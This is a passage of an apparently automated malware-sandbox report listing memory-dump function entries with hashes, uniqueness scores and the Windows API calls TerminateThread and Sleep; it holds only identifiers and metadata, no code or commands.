                        • Opcode Fuzzy Hash: 832615ef9804210029d116db4bcbfb057222643613e05fc4900fae458ffca591
                        • Instruction Fuzzy Hash: B7E0927180A380CFD786AB26E84C38DFF607F1236430580DAD4618B076D3788A44CF41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • TerminateThread.KERNEL32(23B55460,-68C7C033), ref: 0056F9A9
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: TerminateThread
                        • String ID:
                        • API String ID: 1852365436-0
                        • Opcode ID: accb59da44d74c06117de39376933e34d6bd5923c684d0d6dbc3d385db2b678e
                        • Instruction ID: 943776cf34fc787fd0f2380453f41c4ca65a6f882fb1a0693c650dd2898284c0
                        • Opcode Fuzzy Hash: accb59da44d74c06117de39376933e34d6bd5923c684d0d6dbc3d385db2b678e
                        • Instruction Fuzzy Hash: B3411C35D08345CFDB788F14E9E57AA7BA2BFA1354F29957AC44A4B1A2C7309885C701
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • TerminateThread.KERNEL32(23B55460,-68C7C033), ref: 0056F9A9
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: TerminateThread
                        • String ID:
                        • API String ID: 1852365436-0
                        • Opcode ID: 859ddea54170d935735455fe967ac04b8d5d911057c9869ecb6aa2781c354009
                        • Instruction ID: 8570aada4ca1f94937839fed3d9b0ff1943d091f3e74ba786dd51532b279c882
                        • Opcode Fuzzy Hash: 859ddea54170d935735455fe967ac04b8d5d911057c9869ecb6aa2781c354009
                        • Instruction Fuzzy Hash: 0D31D735D08345CFDB348F10E8A57A93FA2BF91364F29557AC84A4B1B2C7759885C741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • TerminateThread.KERNEL32(23B55460,-68C7C033), ref: 0056F9A9
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: TerminateThread
                        • String ID:
                        • API String ID: 1852365436-0
                        • Opcode ID: 859ddea54170d935735455fe967ac04b8d5d911057c9869ecb6aa2781c354009
                        • Instruction ID: f1dfb45802c53cec70cbf304d1b480e19d83324cd9b05645fb1e26e6ccb0957d
                        • Opcode Fuzzy Hash: 859ddea54170d935735455fe967ac04b8d5d911057c9869ecb6aa2781c354009
                        • Instruction Fuzzy Hash: 7531D735D08345CFDB348F10E9A57A93FA2BF91364F29557AC84A4B1B2C7359885C741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • TerminateThread.KERNEL32(23B55460,-68C7C033), ref: 0056F9A9
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: TerminateThread
                        • String ID:
                        • API String ID: 1852365436-0
                        • Opcode ID: 859ddea54170d935735455fe967ac04b8d5d911057c9869ecb6aa2781c354009
                        • Instruction ID: e6847a5ac0f5fd68d699c1e4285cf9db4b467a71026da13e4f76938f0600b7b6
                        • Opcode Fuzzy Hash: 859ddea54170d935735455fe967ac04b8d5d911057c9869ecb6aa2781c354009
                        • Instruction Fuzzy Hash: EF31D735D08345CFDB348F10E9A67A93FA2BFA1364F2D557AC84A4B1B2C7359885C741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • TerminateThread.KERNEL32(23B55460,-68C7C033), ref: 0056F9A9
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: TerminateThread
                        • String ID:
                        • API String ID: 1852365436-0
                        • Opcode ID: d7107e836dc3dc87ee659c7633d69b694d76bcdeaa4cbff7e8f8cc09bb951117
                        • Instruction ID: 0319d6391c6eea2becea8661e1d605126af758ece24dfc568c40e5310610ff66
                        • Opcode Fuzzy Hash: d7107e836dc3dc87ee659c7633d69b694d76bcdeaa4cbff7e8f8cc09bb951117
                        • Instruction Fuzzy Hash: CD311A35D083458FDB748F20E5A57AA3FA2BFA1364F298576C80A8B272C7359885C701
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • TerminateThread.KERNEL32(23B55460,-68C7C033), ref: 0056F9A9
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: TerminateThread
                        • String ID:
                        • API String ID: 1852365436-0
                        • Opcode ID: 110cbbbc6efa3319e2fee6ee79183dfe7d4d5b9878d314af447cd8f1efcd2616
                        • Instruction ID: af14175f186e4446287ebdb4f715b9e4e26a09b8674cfdd13d20f016868ec39d
                        • Opcode Fuzzy Hash: 110cbbbc6efa3319e2fee6ee79183dfe7d4d5b9878d314af447cd8f1efcd2616
                        • Instruction Fuzzy Hash: D831D735D08345CFDB358F10E8A57A93FA2BF91364F2D55BAC84A4B1B2C7359889C741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • TerminateThread.KERNEL32(23B55460,-68C7C033), ref: 0056F9A9
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: TerminateThread
                        • String ID:
                        • API String ID: 1852365436-0
                        • Opcode ID: 1ebc49a6f9b4f8f61d9834311fa042079e5655372bd1939185fe62064937706a
                        • Instruction ID: 506fe377a0d5e2567e414ec5a800b6c8b77e439879350f99be32775c424e0f50
                        • Opcode Fuzzy Hash: 1ebc49a6f9b4f8f61d9834311fa042079e5655372bd1939185fe62064937706a
                        • Instruction Fuzzy Hash: A731C435D08345CFDB748F10E8A97AA3F62BFA1364F2D957AD80A4B1B2C7319989C741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • TerminateThread.KERNEL32(23B55460,-68C7C033), ref: 0056F9A9
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: TerminateThread
                        • String ID:
                        • API String ID: 1852365436-0
                        • Opcode ID: 4508f44af2740f68f01239643d78a629f845fad06353818c88ac6f236e2ee032
                        • Instruction ID: af84b292644b0e58c5a3d59ed7435207ceea3577be32a017840772dab5860d2e
                        • Opcode Fuzzy Hash: 4508f44af2740f68f01239643d78a629f845fad06353818c88ac6f236e2ee032
                        • Instruction Fuzzy Hash: 3A312935E083458FDB348B14E8A57A93F62BF61364F2D867AC44A4B1B2C7319889C741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6fc4907b9f644d4190c5f259ec3082cb23d1ec4606bf06a964c6d3c503936cee
                        • Instruction ID: 002d62680c51172422ed9dd1667b7c6020ce4736257e3f94a1bb750a411180fe
                        • Opcode Fuzzy Hash: 6fc4907b9f644d4190c5f259ec3082cb23d1ec4606bf06a964c6d3c503936cee
                        • Instruction Fuzzy Hash: 65310935D08305CFDB748B10E4AABA67FA2BB91364F2D867AD40A4B1B2C7359C85CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 327fdf49e6df276f822222a51c45da29825af83e348f0743b9b609358201a8eb
                        • Instruction ID: caf5f335c122f38085a7d38737b1529f6c1692a91a4d6248f2251f7f3366a49d
                        • Opcode Fuzzy Hash: 327fdf49e6df276f822222a51c45da29825af83e348f0743b9b609358201a8eb
                        • Instruction Fuzzy Hash: 06312835D08205CFDB348B10E4AABA67FA2BF51364F2D867AD84A4B1B2C7349C85C741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • TerminateThread.KERNEL32(23B55460,-68C7C033), ref: 0056F9A9
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: TerminateThread
                        • String ID:
                        • API String ID: 1852365436-0
                        • Opcode ID: 10a4a8cf19b79bd992b7221a385c135d6b4e16f734aadd73b2e008b9824fd24a
                        • Instruction ID: d884049c6535e89fbb690fd610f0ce5697c1bed99bfb79dfe7806a6e276ef88d
                        • Opcode Fuzzy Hash: 10a4a8cf19b79bd992b7221a385c135d6b4e16f734aadd73b2e008b9824fd24a
                        • Instruction Fuzzy Hash: D821F735D08205CFDB388B14E4AABA57FA2BF51364F2D857AD40A4B1B2C7319CC8CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • TerminateThread.KERNEL32(23B55460,-68C7C033), ref: 0056F9A9
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: TerminateThread
                        • String ID:
                        • API String ID: 1852365436-0
                        • Opcode ID: 83b97b1cd05192e07eb3cfa16cf7719b18604bb663d53951f23cb710d3b277c3
                        • Instruction ID: 5575fb8c66a6aeb4a4adc84e0e0b109968c367ba417ad51a29096207cdcd9c7c
                        • Opcode Fuzzy Hash: 83b97b1cd05192e07eb3cfa16cf7719b18604bb663d53951f23cb710d3b277c3
                        • Instruction Fuzzy Hash: FF21D634D08205CFDB388F10E4AABA57BA2BF51364F2D957AD44A4B2B2C7319888CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • TerminateThread.KERNEL32(23B55460,-68C7C033), ref: 0056F9A9
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: TerminateThread
                        • String ID:
                        • API String ID: 1852365436-0
                        • Opcode ID: 2afb6e96908da50c1ee7a9707b9a968797db7e660f5a1ca4513764596ca77c9c
                        • Instruction ID: d88a4bcf3747b0b576bb4311386eebb4a1aa1130bee4c32d0e4e20ac5d3e4564
                        • Opcode Fuzzy Hash: 2afb6e96908da50c1ee7a9707b9a968797db7e660f5a1ca4513764596ca77c9c
                        • Instruction Fuzzy Hash: E321A434E082018FEB758B14E4A67A57FA2BF51364F2D96B6C8094B1B2C7749CC5C742
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • TerminateThread.KERNEL32(23B55460,-68C7C033), ref: 0056F9A9
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: TerminateThread
                        • String ID:
                        • API String ID: 1852365436-0
                        • Opcode ID: 42fc3c88b0fa3c5d77a3bd34e6d39f48051c3138bf49cee65fcb19ce996c0f41
                        • Instruction ID: 71504ea925fae704b1a1891c6f96d64eeec4449102465be85b9b2cb7f66d748a
                        • Opcode Fuzzy Hash: 42fc3c88b0fa3c5d77a3bd34e6d39f48051c3138bf49cee65fcb19ce996c0f41
                        • Instruction Fuzzy Hash: 20219034E082018EEB748B10E4AABA57F62BB51368F2D96B6C4094B1B2C7719CC5C741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 416b6460c76e6ce352536b35986cf209fd22d2cef4dc4ddfa9324048d5f9ae1d
                        • Instruction ID: 474b16725fca5753d6b5c2067e2879b5f11f6d03b3170393cbd7a666cb3efafb
                        • Opcode Fuzzy Hash: 416b6460c76e6ce352536b35986cf209fd22d2cef4dc4ddfa9324048d5f9ae1d
                        • Instruction Fuzzy Hash: 1AE092B6954200DBDAD0AA60749CBD76F58BB24325F264867E9098B0B3C21ACC02C761
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 1a3e6cd80ff0a1fd5fd8b9d178f13556850e6039c81413ebfafdfcd8ca866eb4
                        • Instruction ID: 8b1d28547567f333a4d38fd372035f5e01127d6f3a2bfea793f97db220071da9
                        • Opcode Fuzzy Hash: 1a3e6cd80ff0a1fd5fd8b9d178f13556850e6039c81413ebfafdfcd8ca866eb4
                        • Instruction Fuzzy Hash: 9EE06D70908301CFE3D0AB50E08EB56BF697B04715F0589A6ED094F1B3C72A9C40CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 49e94e019033457bba85c580c5284fe5d33d54f0b59f6cb0924a0662dea49f41
                        • Instruction ID: bd1130aa2a8b94a8498848355df411787d888fbb2ec158f11b293f03d28358d0
                        • Opcode Fuzzy Hash: 49e94e019033457bba85c580c5284fe5d33d54f0b59f6cb0924a0662dea49f41
                        • Instruction Fuzzy Hash: 67E0EC70908301CFE7C4AFA0E48DB157E65BB04715F1588A6EA190F1B3C76B8D40CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: cfd188c8f81025e5f1d03440df78aa980328d78fabeab8bd7181f2f64318ac39
                        • Instruction ID: 7fbe77f365d6d377230c4b7e28ace6725b00b0f99520deec654bc21a151ea4bf
                        • Opcode Fuzzy Hash: cfd188c8f81025e5f1d03440df78aa980328d78fabeab8bd7181f2f64318ac39
                        • Instruction Fuzzy Hash: AEE01270948300CFE7849F50D08DF117EB57B04715F158496EA094F1B3C76ADC40CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: c30ec48bb9ed63f9ee4960483d5492fccb97252a9162f7d77f8a83950d5f443b
                        • Instruction ID: 3f7652fb404eba7799bd8f04259b3cfdab82249d6f2b1c5d9775d301a48d7c5f
                        • Opcode Fuzzy Hash: c30ec48bb9ed63f9ee4960483d5492fccb97252a9162f7d77f8a83950d5f443b
                        • Instruction Fuzzy Hash: 2EC08C30104244EBE3D1AB53A49E7C3AF587B00B21F014C8AED69CB1A3C32ADC01DB22
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions